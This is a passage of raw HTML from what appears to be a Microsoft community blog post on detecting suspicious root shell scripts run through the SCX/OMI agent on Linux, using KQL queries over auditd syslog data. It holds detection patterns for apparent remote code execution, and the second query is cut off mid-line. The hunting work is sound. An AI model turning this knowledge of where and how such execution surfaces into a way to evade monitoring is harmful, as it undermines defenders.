You will see that the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">current working directory (cwd)</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;is the same, but the command line or&nbsp;in this case the&nbsp;script is now being hosted at the following directory:&nbsp;&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">/etc/opt/microsoft/scx/conf/tmpdir/.&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;The name of the scripts in that directory has the string “</SPAN><STRONG><SPAN data-contrast="auto">scx</SPAN></STRONG><SPAN data-contrast="auto">” as a prefix. For example:&nbsp;scx</SPAN><STRONG><SPAN data-contrast="auto">zEPOS4.</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">Syslog</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | parse&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">SyslogMessage</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;with "type="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun ContextualSpellingAndGrammarErrorV2 SCXW267943799 BCX8">audit(</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">" * "): "&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventData</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR 
class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | where&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;=~ "AUOMS_EXECVE" and&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventData</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;has '/var/opt/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8 DefaultHighlightTransition">microsoft</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">scx</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">tmp</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">'</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | project&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8 DefaultHighlightTransition">TimeGenerated</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">,&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">, Computer,&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventData</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | parse&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventData</SPAN><SPAN 
class="NormalTextRun SCXW267943799 BCX8">&nbsp;with * "</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">syscall</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">syscall</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">syscall_r</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">=" * " success=" success " exit=" exit " a0" * "&nbsp;<BR /></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">ppid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">ppid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">pid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">pid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">audit_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">audit_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">auid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">auid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;" user=" user "&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">uid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">uid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;" group=" group <BR />" gid=" gid "</SPAN><SPAN class="NormalTextRun 
SpellingErrorV2 SCXW267943799 BCX8">effective_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">effective_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">euid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">euid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">set_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">set_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;" suid=" suid <BR />"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">filesystem_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">filesystem_user</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">fsuid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">fsuid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">effective_group</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">effective_group</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">egid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">egid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;<BR 
/>"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">set_group</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">set_group</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">sgid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">sgid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">filesystem_group</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">filesystem_group</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">fsgid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">fsgid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">tty</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">tty</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;<BR />"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">ses</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">ses</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;" comm=\"" comm "\" exe=\"" exe "\"" * "cwd=\"" cwd "\"" * "name=\"" name "\"" * "</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">cmdline</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">=\""&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 
BCX8">cmdline</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"\"" *</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | where&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">uid</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;== '0'</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | where cwd == '/var/opt/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">microsoft</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">scx</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">tmp</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">'</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | where comm ==&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">'sh</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">'</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | extend Timestamp =&nbsp;</SPAN><SPAN class="NormalTextRun 
SpellingErrorV2 SCXW267943799 BCX8">TimeGenerated</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">,&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">HostCustomEntity</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;= Computer,&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">AccountCustomEntity</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;= user</SPAN></SPAN><SPAN class="EOP SCXW267943799 BCX8" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></SPAN></PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="executescript_kql_query_execution.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311949iC704AAECED655314/image-size/large?v=v2&amp;px=999" role="button" title="executescript_kql_query_execution.png" alt="executescript_kql_query_execution.png" /></span></SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN class="NormalTextRun BCX8 SCXW42733508">I was wondering what process had created that file in that directory. 
I ran the following query</SPAN><SPAN class="NormalTextRun BCX8 SCXW42733508">&nbsp;to answer that question</SPAN><SPAN class="NormalTextRun BCX8 SCXW42733508">:</SPAN></P> <P>&nbsp;</P> <PRE><SPAN class="NormalTextRun BCX8 SCXW42733508"><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">let<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">syscallsList</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>= dynamic(["unlink","</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">openat</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">","</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">chmod</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">"]</SPAN><SPAN class="NormalTextRun ContextualSpellingAndGrammarErrorV2 SCXW164422095 BCX8">);</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">Syslog</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| parse<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8 DefaultHighlightTransition">SyslogMessage</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>with "type="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun ContextualSpellingAndGrammarErrorV2 SCXW164422095 BCX8">audit(</SPAN><SPAN 
class="NormalTextRun SCXW164422095 BCX8">" * "): "<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">EventData</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| where<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>=~ "AUOMS_SYSCALL" and<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">EventData</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>contains "/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">etc</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">/opt/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">microsoft</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">scx</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">/conf/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">tmpdir</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">/"</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| project<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">TimeGenerated</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">,<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">, Computer,<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun 
SpellingErrorV2 SCXW164422095 BCX8">EventData</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW164422095 BCX8"><SPAN class="SCXW164422095 BCX8">&nbsp;</SPAN><BR class="SCXW164422095 BCX8" /></SPAN><SPAN class="TextRun SCXW164422095 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW164422095 BCX8">| parse<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">EventData</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>with * "</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">syscall</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">syscall</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">syscall_r</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">=" * " success=" success " exit=" exit " a0" * <BR />"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">ppid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">ppid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">pid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">pid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">audit_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">audit_user</SPAN><SPAN class="NormalTextRun SCXW164422095 
BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">auid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">auid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>" user=" user "<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">uid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">uid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>" group=" group <BR />" gid=" gid "</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">effective_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">effective_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">euid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">euid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">set_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">set_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>" suid=" suid <BR />"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">filesystem_user</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">filesystem_user</SPAN><SPAN class="NormalTextRun SCXW164422095 
BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">fsuid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">fsuid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">effective_group</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">effective_group</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">egid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">egid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;<BR /></SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">set_group</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">set_group</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">sgid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">sgid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">filesystem_group</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">filesystem_group</SPAN><SPAN class="NormalTextRun SCXW164422095 
BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">fsgid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">fsgid</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">tty</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">tty</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;<BR /></SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">ses</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">ses</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>" comm=\"" comm "\" exe=\"" exe "\"" * "cwd=\"" cwd "\"" * "name=\"" name "\"" *<BR /> "<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">path_name</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">path_name</SPAN><SPAN class="NormalTextRun SCXW164422095 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW164422095 BCX8">path_nametype</SPAN><SPAN 